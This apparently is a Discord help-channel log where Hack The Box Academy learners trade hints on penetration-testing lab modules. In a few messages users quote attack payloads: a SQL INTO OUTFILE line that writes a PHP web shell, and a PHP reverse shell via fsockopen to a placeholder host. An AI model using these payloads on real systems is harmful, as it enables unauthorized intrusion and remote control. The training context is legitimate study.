solar granite
cosmic dock
#

how do

solar granite
south lark
#

is any of the staff aware of the state of the final challenge on the shells/payloads module? nomachine is literally unusable and the module needs to be completed for CPTS

cosmic dock
solar granite
cosmic dock
#

Like, i'm trying to see why the prompt shows the current jobs and agents in the parrot OS msfconsole, and the kali one doesnt. Because i'd like to do that with my kali machine. But i'm not seeing any config files that would cause that to change, like msfconsole.rc for example

solar granite
cosmic dock
#

Cool beans. Let me know if you see anything

solar granite
#

I'm interested to know where/when it's set as well, let me know if you happen to find out

cosmic dock
#

I'll take a look in a few and let you know, @solar granite

sage jackal
#

Active Directory Enumeration and Attacks Skills 1; I got the Kerberoastable users password but not sure how to get to MS01 any help? I’ve also been trying to interact with the sql instance with no success

wind gust
#

Password attacks lab - medium :after getting access to user D need hint to go to root

wind gust
placid quest
#

@wind gust see if you can download it on your machine

wind gust
south lark
#

uhhh are all of the targets in the metasploit module unreachable???

austere cave
#

Day 7 - Almost Day 8! Boss Up! NoMoRelapsesTrustMe!!!!!!

lethal atlas
wind gust
lethal atlas
#

but you have access to D

trail spade
#

Hi man, can you help me with the previous question about Will credentials I’m stuck ?

#

Hi everyone ! if someone can help on the module « Password attacks » I’m stuck with the Will and Kira credentials. I tried few things but nothing seems to happen

rustic sage
#

so guys i finished file inclusion module , which one should i start
tier 0

#

probably file transfer

onyx rapids
#

Can someone message me the command injection skills assesment injection? I know which request, tried all the parameters with payloads that bypass the filter, but still no go

wraith spoke
#

goodevening

#

I am working on the network enumeration with nmap and I have tried to spoof an IP, however this is the result: nmap 10.129.2.48 -sS -Pn -n -p 53 -S 10.129.2.200 -e tun0
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-05 21:58 CEST
setup_target: failed to determine route to 10.129.2.48
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.02 seconds

#

Why can't nmap determine a route?

onyx rapids
wraith spoke
#

tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.15.56 netmask 255.255.254.0 destination 10.10.15.56
inet6 dead:beef:2::1136 prefixlen 64 scopeid 0x0<global>
inet6 fe80::41bb:72f5:e03b:4ef1 prefixlen 64 scopeid 0x20<link>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 7455 bytes 413059 (403.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 19760 bytes 951509 (929.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

#

yes

onyx rapids
wraith spoke
#

Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 192.168.6.2 0.0.0.0 UG 100 0 0 eth0
10.10.10.0 10.10.14.1 255.255.254.0 UG 0 0 0 tun0
10.10.14.0 0.0.0.0 255.255.254.0 U 0 0 0 tun0
10.129.0.0 10.10.14.1 255.255.0.0 UG 0 0 0 tun0

onyx rapids
#

I'm pretty sure that looks good, so maybe something to do with nmap

wraith spoke
#

okay, thx for helping me checking

onyx rapids
#

People say the -S isn't working right with HTB, maybe there is an alternative

barren path
viscid prairie
#

Hi, anyone know how to resolve active subdomain enumeration, it in "Information gathering web edition" i'm stuck in there and idk what i have to do

west canopy
woeful oxide
#

Hey guys

#

quick questions

#

working on web services & API attacks - LFI

viscid prairie
woeful oxide
#

I don't understand how to find the existing user on the server whose name starts with Ub

west canopy
woeful oxide
#

oooh got you

west canopy
#

yep it has all the users 😉

woeful oxide
#

I was thinking of searching a file names users

#

thanks m8

west canopy
#

it feels so good reading the passwd file

#

yikes

#

sure

potent pewter
#

hew guys can anybody help me with the shell and payload live engagement i m one the last host-3. i found that was vulnerable to ms17-010 however when i try to get a meterpreter it keeps failing , i also found that i can upload aspx files directly to the host from the web so i thought of getting a webshell but still nothing

marble raft
#

Hi guys! Can someone help me? Need a nudge on Attacking Common Services - Attacking SQL Databases. In the second question is asked:

What is the password for the "mssqlsvc" user?

Looked everywhere in the databases but didn't find nothing

thorn urchin
#

you check sys.sql_logins?

#

otherwise mssql is pretty infamous for providing routes to getting shell, so its possible they want you to go that route. But havnt done that specific module myself yet so Im just spitballing

vital adder
vital adder
vital adder
pastel ginkgo
#

I'm working on footprinting medium and i've || mounted the nfs, but I can see that the permissions require me to be root. How do I open the folder as root? I've tried sudo cd, but that doesn't work. or do I need to be logged into root? ||

vital adder
#

use sudo su

pastel ginkgo
#

Thanks, I just found out I forgot the password to my root user account on this vm 🤦‍♂️

marble raft
#

thanks @vital adder what you proposed worked. But i have some questions, when we use this technique the NTLM hash we intercept is the account used by the service right?

#

If we had for example SSH service available in the target, would it be possible to ssh with the service account?

vital adder
#

if that service account is a user and have ssh enable on the target machine then i think yes

shrewd heath
vital adder
#

it want the flag

shrewd heath
#

ik

#

but how am I supposed to go about that?

vital adder
#

so you need the find the exploit and exploit the target machine

shrewd heath
#

well, I can't connect to the target

#

through metasploit

#

which is what it goes over

#

but I don't think it actually wants me to use metasploit

#

I think it was just going over the basic functions of it

#

that's what I get when I use searchsploit

#

for the service running on the server

vital adder
#

you can still use metasploit for this if you want but you need to set the rhost and the rport right

shrewd heath
#

so, how do I set the RHOST for this?

#

WAIT

#

sorry

#

didn't see the RPORT

#

and ofc I would set the LHOST as well?

vital adder
#

nope

shrewd heath
#

okay

#

thanks, the module failed to mention to set the RPORT

#

but I should have known

vital adder
#

yeah but if this is just some other module then i get why it don't need to show you how to set everything but this is a module for beginner

shrewd heath
#

also, after using the exploit

#

thats the path it goes to

#

and thats the objective

#

so where would I find the flag.txt file?

vital adder
#

yeah.. the objective is to get the flag at /flag on the target system and the place that the out put was save it is a metasploit thing

vital adder
shrewd heath
vital adder
#

so in that exploit the FILEPATH is the file that the exploit going to get, the default is /etc/passwd change this to /flag.txt

#

also you can only find this options in the advanced menu but you can use set verbose true for the exploit to just print out the file that it get

shrewd heath
#

okay

#

I am setting everything again

rustic sage
#

Listen man listen

#

Can anyone here track my ip without me clicking anything

shrewd heath
#

it worked

pearl island
#

Hey all, need some direction on Attacking Common Services Easy Skill assessment?

viscid prairie
#

anyone know how to resolve active subdomain enumeration from information gathering

#

i'm stuck in find "TXT record as the answer" and anther point to resolve it

vital adder
#

hint do ||dns zone transfer|| on the main domain and dump the txt record of the subdomain that have the same ip as the ||ns|| subdomain

vital adder
pearl island
#

@vital adder can I DM?

vital adder
#

sure

viscid prairie
#

and don't reponse it

#

if you need pic tell me and type yoy on DM

vital adder
#

i was helping the other guy if you still need help shoot me a dm with that screenshot

mortal nova
#

Hey, has anyone completed the skills assessment for Command Injection? I’m a little stuck. I thought I constructed the perfect injection after writing several notes on the possible command that is used in the backend, but after trying it along with multiple canned payloads from PATT via Burpsuite, I still get “Malicious request denied!” in the response. Please @ me when you reply to my message

sturdy igloo
#

Need Help - Skills Assessment - SQL Injection Fundamentals

vital adder
#

hi @sturdy igloo @mortal nova what did you try and what is the issue?

sturdy igloo
vital adder
#

nice

wheat garden
warm turret
lyric echo
#

could someone help me with the 'Footprinting - Easy' assessment. I was able to download available files from the users ftp.. but when trying to specifically use the keys, nothing seems to be working.

vital adder
#

oh wait that's weird you should be able to login via ssh with the key you found

lyric echo
vital adder
#

what permission did you give that key on your machine?

lyric echo
onyx cove
#

Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer. I saw somewhere that the answer is in http-enum after using aggressive scan but I don't know how to use that information

#

pls help

graceful mortar
#

,

onyx cove
#

nvm i found it

#

thanks

drowsy garden
#

Attacking Metasploitable 3 [Lab]

Scan the target machine with nmap

Open your terminal
Run nmap -v -p 1-65535 -sV -O -sS -T4 target_IP -oG Metaspoitable3.txt
Review the results

For this module, we will be attacking Metasploitable 3 (198.18.100.107

) for our lab. This requires critical thinking and will not be explicitly explained.

We will be using the same target as last week, but this time we will be attacking it.
Do not use only metasploit, find the exploit in searchsploit and attempt to use the exploit script.
Screenshot your successful attempts with both metasploit and the exploit scripts.
Comment on the discussion board about how it felt when you got your first shell on a vulnerable system.

Metasploit is already installed and can be run with:

Open the terminal
Type msfconsole
Then type search "exploit name" (without the quotes)

Here's my results from my nmap scan

I wanted to try an ftp exploit so I found this through Searchsploit first but I don't know how to run it in the terminal, even after I installed tftp

For Metasploit, I found a number of exploits that were rated as excellent for FTP. On the list modules 107, 108, 118, 141 and 174 are all unix/linux exploits which I believe are appropriate seeing how the computer is running ubuntu 14.04. My issue is I don't know how to run these exploits in the terminal either or how to configure the proper payload. There's over 948 payloads and I know that there's certain ones that are compatible with the unix/linux exploits. I'm not sure which ones though and I've searched the internet for the right ones.

As of now I'm stuck on this lab. I've searched for FTP exploits and found some more info such as a brute force attack or the anonymous exploitation. I'm a bit overwhelmed with where to start or if I should be looking at a different exploit other than FTP such as http or mySQL. Any help would be greatly appreciated as I am a complete novice at this.

thorn urchin
#

exploits are version specific

#

you have the ftp version there, search for specifically that one

#

if theres a known exploit for it, then youll stumble across it. if there isnt, then you can try some generic attacks against ftp like checking for anon logins, or pick a different service.

frigid ingot
#

good evening all, working on intro to python 3, stuck on code block 2 in the first set of questions

#

i've tried indexing where D, C, B, A and that was wrong

brave prawn
#

do i only have the instances so lagging now?

warped phoenix
#

Hello, can I get a nudge on the Skill Assessment 1 for Common Web Apps? I know what is vulnerable but struggling on getting a foothold

loud sapphire
hollow lake
#

Why has my nmap -p- -sV {ip} taken over 2 hours 😭

loud sapphire
hollow lake
#

im just doing what the htb walkthrough did

loud sapphire
#

refresh the server?

hollow lake
#

and restart the nmap?

loud sapphire
#

refreshing the server is likely to give you a new IP so yeah.

hollow lake
#

Hmmm okay, i will try, thank you

loud sapphire
#

unless you are looking for filtered ports.. use --open on the end.

hollow lake
#

im on the redeemer module thing, if you know?

loud sapphire
#

easier to link me via dm.

hollow lake
#

okay, will do

solar granite
#

Need some help with sql injection fundamentals skills assessment. I managed to ||get an sql shell via sqlmap||, but I can't write any files. I ||checked the permissions|| and everything seems fine, but it errors out: ||select '<?php system($_REQUEST[0]); ?>' into outfile '/var/www/html/shell.php'|| ||execution of non-query SQL statements is only available when stacked queries are supported||

I also found the db creds for the root account, but I can't find the port to login.

loud sapphire
#

nah... no matter what i do the server dies almost 5 minutes in.......

http://10.129.182.217/assessment/

ideas please?

VPN is fine. PwnBox is fine.

both have the same issue

vital adder
vital adder
loud sapphire
#

xss assessment

vital adder
vital adder
#

When I have the same issue that seem to work for me

loud sapphire
#

will try shortly. ta

#

nah. almost immediately times out.

vital adder
#

oh lastly i did saw some people also complain about this and if you keep getting that issue i think you should report it to support

cerulean silo
#

Examine the target and find out the password of the user Will. Then, submit the password as the answer.

#

Can anyone help me with this?

#

this is from credential hunting in linux

granite plover
#

I'm stuck, unable to get remote execution on beginner/netmon... EDIT: nvm i accidentally duplicated a noti instead 🙄

vital adder
#

which module is that?

vital adder
cerulean silo
#

noicu

marble raft
#

Hi guys! Could someone help me with Attacking Common Services - Easy? I can't seem to bruteforce the SMTP server.

I'm using the users.list from the resource section

mortal nova
vital adder
marble raft
#

Hey @vital adder may i DM you?

vital adder
#

sure

solar granite
#

Blind sql injection is much harder to do by hand

vital adder
#

oh you sqlmap don't need to bypass login

vital adder
solar granite
vital adder
#

oh nope there are no subdomain

#

for this after login you don't have cookie or anything so i think it's server side stuff so sqlmap going to be a bit tricky

solar granite
vital adder
#

oh sqlmap is going to use some weird payload and that payload doesn't even have anything to do with the actual payload

#

and also if you don't login it will redirect you back to the login page so if you setup sqlmap incorrectly sqlmap will trying to do some sql injection in the login page

brave prawn
#

Hey, module Documenting & Reporting. This question.... I am stucked... haha, can't google something or just type in incorrect format)

vital adder
#

but you can find the almost right payload in the cheat sheet also in previous section

solar granite
brave prawn
vital adder
vital adder
lapis pivot
#

Hello everyone 😄.. did anyone know what is the name of the auto tool that includes nmap gobuster fuff and more.. all in one tool

#

I have seen it in YouTube tow days ago but unfortunate I didn't recognize the name of the tool and I couldn't find that video again

loud sapphire
lapis pivot
loud sapphire
#

if you really want to do the bare minimum... i guess you could try some vuln scanners like OpenVAS....... though, i find them to be superficial at best and largely pointless as they miss a shit ton.

drowsy garden
lapis pivot
#

It has GUI also

dense ferry
#

YouTube has view history you can check

#

(if you were logged in)

#

@lapis pivot

solar granite
vital adder
#

for the checking privs part i did use SECURE_FILE_PRIV and i'm not sure if that will work but check some the command for privs in the cheat sheat

granite plover
#

none of my attempts over the last 5 hours to get a reverse shell through powershell on the Netmon target have worked. I can't even query the target box and get it to write something to file- attempting to run Get-LocalUser > users.txt creates the file but its empty... EDIT: finally got it. turns out || the prtg ps script requires three parameters or it errors out, and generally just seems very finicky about cmd (parameter) format||

wary river
#

is there a decent module checkpoint to hit where prottey much all of the information for the comptia securtiy+ is covered by? or would it be best to just find another way to study for the test specifically and keep going through the HTB modules?

thorn urchin
#

security+ is a much different beast

wary river
#

okay, so just find another way to study for it? any recommendations for where i could do it for cheap?

jagged zenith
#

Hello how are you guys

sturdy igloo
#

Need help SQLMap - What's the contents of table flag3? (Case #3)

#

i keep getting a flag that is not accepted

marble raft
#

Hi guys! Been having some trouble uploading a rev shell to C:\xampp\htdocs, always get a SQL Syntax error but can't seem to find what i'm writing wrong

Using the command: SELECT "<?php -r '$sock=fsockopen("IP", Port);exec("sh <&3 >&3 2>&3");?>'" INTO OUTFILE 'C:\xampp\htdocs\shell.php'

jagged zenith
jagged zenith
marble raft
#

I actually have a cmd shell, but can only run dir there

jagged zenith
#

Any module leaning

marble raft
#

hey man can i dm you?

sturdy igloo
vagrant mist
#

Stuck in the linux privilege escalation challenge can't get to flag 4, can someone help ?

lament tartan
#

think i missed something on the Credential Hunting in Linux module as process would of taken too long without checking hint.. anyone i can DM to confirm?

vital adder
#

sure shoot me a dm if you still need help with that

vital adder
iron basin
#

Anyone else able to spawn a VM instance? Says nome are available to me.

thorn urchin
#

htb having issues atm

#

might be a go outside and touch grass day

west canopy
iron basin
vital adder
#

so right now i can't spawn the target and the pwnbox on htb academy and on the normal htb

west canopy
#

Yes I am getting errors spawning PwnBox, they must be doing maintenance

tidal gust
#

same here, can't spawn pwnbox

iron basin
#

Aw, fair enough.

#

Hopefully they will be back soon, would love to continue to grind out the JPT path to get to take the new exam offered.

deft meteor
#

Digital ocean is doing maintenance in their uk data center

#

(Digital ocean hosts pwnbox)

mellow turtle
#

F

tough inlet
#

Hi can someone help me with the shoppy machine 🙂 pls

vagrant mist
woeful oxide
#

Hey guys

#

someone who can give a hand with the web services & api skill assessment

#

Script:

#

Output:

vital adder
vital adder
woeful oxide
#

4sure

hasty temple
#

Did you ever figure this out?

maiden field
#

Hey i'm having some trouble with this question in the footprinting module smtp section: Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.

I've try connecting with telnet and using VRFY but I don't find anything

#

i've also try smtp-enum-users.nse with nmap and i found nothing

placid quest
#

@maiden field use Metasploit

maiden field
placid quest
#

Ok

thorn urchin
#

the first thing to learn about academy modules is they lie to you

#

its perfectly acceptable and sometimes encouraged/expected to use tools other than what is explicitly in the module

#

might not be the case for that specific module, but point being dont fret about using alt methods to get the answer

maiden field
#

yeah but idc I know theres a "normal way" for this section thats what the hint says

tranquil urchin
#

Hi, I am definitely overthinking this one, and the answer to my question will be stupidly obvious, but... I am doing the Vulnerability Assessment module Nessus Skill Assessment, and there is this instruction to "Authenticate to <target IP> with user "htb-student" and password <PASS>". How do I perform a nessus scan on another host that is predefined in the module, that only the <target> can reach, and the only port open on <target> is 22 ssh?

mellow turtle
#

replace the localhost with the given ip

#

@tranquil urchin

tranquil urchin
quasi moth
#

Hi, I have a little problems with last question in Web Enum Skill Assessment. I was tried to brute using gobuster, but probably I use wrong word list

mellow turtle
#

@quasi moth whats the module name?

quasi moth
mellow turtle
#

read the hint

quasi moth
vital adder
#

and i think that subdomain is removed

mellow turtle
#

btw i found that subdomain searching at google

vital adder
mellow turtle
#

@quasi moth

quasi moth
mellow turtle
#

nice

thorn urchin
timber hatch
#

in the footprinting medium lab, i mounted the file system, see the tickets, found a username and password but it is wrong?!POGGERS

#

that's mean...

prisma mason
#

can anyone help me to figure out what i did wrong with my payload and why it says Document.write at the top? Im in the XSS phishing module

solar zodiac
#

hi everyone! I'm getting a weird error when im trying to connect to the academy vpn in my kali vm

#

can anyone help?

vital adder
#

i think i have the same issue a couple of day ago try download a new vpn

raven cairn
#

Can any help with the webservice and APi attacks. I feel very confident with SQL Injections, but I don't understand how to read this WSDL even with the help of the module

vital adder
vital adder
severe jolt
#

Can I ask a quick question about htb academy

#

Is it good to learn kali in?

#

Cus im REALLY new to hacking and kali

vital adder
vital adder
# severe jolt Cus im REALLY new to hacking and kali

if you are new and you don't know how to use linux then yes you need to learn linux also check this video to see what else do you need https://www.youtube.com/watch?v=lhz0-qAQlBM

Sponsor: https://go.intigriti.com/thecybermentor
Blog Post: https://tcm-sec.com/so-you-want-to-be-a-hacker-2022-edition/
Academy: https://academy.tcm-sec.com

Timestamps:
0:00 - Introduction
0:53 - Intigriti Sponsorship
1:55 - Building a Foundation
2:10 - Important Notes
5:37 - Basic IT Skills
8:28 - Networking Skills
12:38 - Linux Skills
17:04 ...

▶ Play video
severe jolt
#

Alr

fathom swift
#

Has anyone else had issues spoofing your IP address for an nmap scan? Everytime I specify -S (with the appropriate interface selected via -e, and -Pn as well), I get an error saying "setup_target: failed to determine route to <ip>". Using Kali with a VPN into HTB.

vital adder
#

it's look right so i think so

prisma mason
vital adder
#

try remove the --> at the end

raven cairn
#

😭

vital adder
lyric echo
#

Hello, Im on the footprinting medium lab. I have the dev credentials and was able to find out what they are used for... but Ive been stuck trying to determine how to get he mssql SA account password. can someone help please?

vital adder
#

wdym by dev credentials? i don't see anything about a dev account in my note

lyric echo
vital adder
#

yep that's right and hint you can try those cred somewhere else to find the sa user cred

lyric echo
#

Thanks @vital adder

raven cairn
#

I don't get why my request won't work

#

I just want to run my request thru SQLmap instead of building a stupid python script for the skills assesment

vital adder
#

but all you need to do is replace some stuff in the stupid python script with the username and password syntax and change the SOAPAction

lyric echo
#

@raven cairn @vital adder fellas, I just checked my notes on that.. I believe it is the WebServices & Api assessment... but for the SOAPAction in burpe.. the only difference is that login is in "".... so I have it as SOAPAction: "Login"

vital adder
#

ohh that

raven cairn
#

So it cant go thru Sqlmap

vital adder
#

oh that's right

#

only after submitting the proper SQLi payload, otherwise it will hang or throw an error

#

if you don't send the right sql injection payload the server will hang

#

so that's super annoying for testing

raven cairn
#

Should I just give up on using sqlmap then?

#

😭

vital adder
#

i'm not sure if that will work or not because all you need is a ||login bypass payload||

raven cairn
#

I’ll figure it out. Thanks for help

wind gust
#

For attacking email services i found the user and trying to bruteforce with the given password list but got no hit

vital adder
#

ok i just try with the burp method and it's working fine for me so you should be good if you use the right payload @raven cairn

wind gust
vital adder
#

so for the brute force did you use the full mail address for the username?

onyx rapids
#

If anyone out there is listening; Give MRtom a promotion, this squirrel has brought me back from the brink of insanity multiple times throughout the last few weeks

sturdy igloo
#

Can someone give me nudge with the SQL Essentials Case #10?

vital adder
#

hint if you run sqlmap in the right request you can just get the flag

sturdy igloo
#

i get connection request error and no luck with ||--random-agent||

#

sqlmap is labeled as an easy module but sorta difficult for me

vital adder
#

oh there are no easy module only hell module and less hell module

#

and did you use the request that have the id thing?

runic nimbus
#

Let me know if I'm doing something wrong:
Installed the ovpn file from VPN Settings. Trying to ping the target but doesnt work. The pwnbox isnt able to access the target as well. Tried all the servers.

vital adder
vital adder
runic nimbus
#

I'm not able to ping the target from the spawned machine's terminal as well

vital adder
#

yeah that target is a docker container can you can't ping that

#

for that type of target it will give you an ip and a port and that is all you can access

sturdy igloo
vital adder
#

oh i just save the request and use that and for the tag i just use the dump flag tag

thorn urchin
#

fun fact, sqlmap can import burp logs to auto figure out some stuff 🙂

vital adder
#

oh nice

thorn urchin
#

one of those obscure features from rtfm that doesnt get covered in like any guides for some reason

#

theres also a burp plugin to run sqlmap from burp as well, but I havnt tried it out.

sturdy igloo
#

🙂

hazy grotto
#

Can you help with the locations?

I've clicked offices and nothing is listed but remote and mobile. Am i missing something?

gleaming spindle
#

Hi I need help on hard lab of nmap module problems in discovering the service version (flag). I have found a few open ports with their versions, anyone willing to answer a DM about this? thanks

warm turret
#

@sturdy igloo keep in mind that your sentence to execute sqlmap there will dump all tables from all databases and for ctf is not the big deal only if you're doing blind injection. In the other hand on a real target if you do not specify the -D -T you'll be trying to download probably some GB of data. Well anyway on a real target you should not download any data as a white hat hacker 😉

hazy grotto
#

OSINT: Corporate Recon Staff section... the video is no longer able to watch. Can someone fix this?

shrewd heath
#

I got past the first part, which was:

#

but I can't figure out how to import the keys for ssh

#

I did the vim id_rsa command

#

then I did the chmod 600 id_rsa

#

then I did: ssh user@IP -p XXXXX -i id_rsa

#

but when I do that last one^

#

it says:

carmine quail
#

...fixed...

vital adder
# shrewd heath

so basically you just copy the key in a weird way for missing something or even nothing and all and the key is corrupted or something so if you try copy the whole file not just the key you can use python for this

vital adder
shrewd heath
#

I did cat

#

and I saw the key

#

I was figuring it out

carmine quail
#

the osTicket module is stupid... just my opinion...

vital adder
#

yep the version is the target machine is different from the example

vital adder
shrewd heath
vital adder
#

i just check and the think is you don't need any key

#

just login with the given cred

shrewd heath
#

got it!

#

thanks for the help!

shrewd heath
#

ssh into it as user1 with password password1

#

(that part was easy)

#

and I ran sudo -l

#

to see what I could do

#

so then I went to user2 in /bin/bash and got that flag

#

but then I did cat /root/.ssh/id_rsa

#

and copied that, yada yada yada

viscid prairie
#

Hi in the "Information Gathering - Web - Skills Assessment" the last point is

#

||Perform active subdomain enumeration against the target githubapp.com. Which subdomain has the word 'triage' in the name? anyone know how to resolve, i was use sublist3r but i don't found something||

#

and have error to say "Virustotal probably now is blocking our requests"

vital adder
vital adder
#

nope it's at subdomainfinder.c99.nl

viscid prairie
#

ok thanks

flint agate
#

Hello
I am trying the SQLMAP module again
Can somebody give me a hand?

slim plover
#

Hello

I am trying skills assessment in pivoting section. And I am stuck in 6th question. So I RDPed to machine with ||mlefay|| and got creds for ||vfrank||. I can see the system is connected to another network with IP ||172.16.6.35|| and I am guessing the next host is within that network.
I tried to perform ping sweep on ||172.16.6.x|| network but the only host I am getting back response from is ||172.16.6.35||.

Someone give me a nudge please

noble leaf
# woeful oxide Output:

You included everything in the while loop except the print so the code is just repeating the input stage… fix this by tabbing the print in the while loop.

warped phoenix
#

Quick sanity check. For the last Skill Assessment (Skill Assessment II) in the Attacking Common Web Apps Module, I have a web shell on the machine. However, for the life of me, I cannot find the flag. Would someone be open to providing a nudge on whether I am overlooking the flag in current user or if I am missing another step

flint agate
#

Is this ok on the sqlmap case 8 module ?

placid quest
#

@flint agate no

flint agate
#

bruh I finnally resolved the exercise

#

what a ride

autumn garnet
#

Hi im trying to do the shells & payloads but the connection thought nomachine is really bad, it toke me like 45 mins to get to the website for the first host because nomachine kept disconnecting.

rustic sage
#

r u on vpn

autumn garnet
#

vpn or pwnbox same issue

rustic sage
#

i mean do you use a personal vpn

autumn garnet
#

no

#

vm

rustic sage
#

if the issue is between pwnbox and target then not sure..

autumn garnet
#

alright well thanks for your help

rustic sage
#

try a diff machine id suggest see if its isolated

autumn garnet
#

not a bad idea. i never have network connection issues

#

i also have connection issues whenever i spawn a windows machine

cosmic dock
#

I'm having issues brute forcing "sam"'s password in the password attack module, i've done all the other things suggested in previous questions - including that of cutting the wordlist, and attempting to bruteforce FTP instead of SSH, but nothing is working.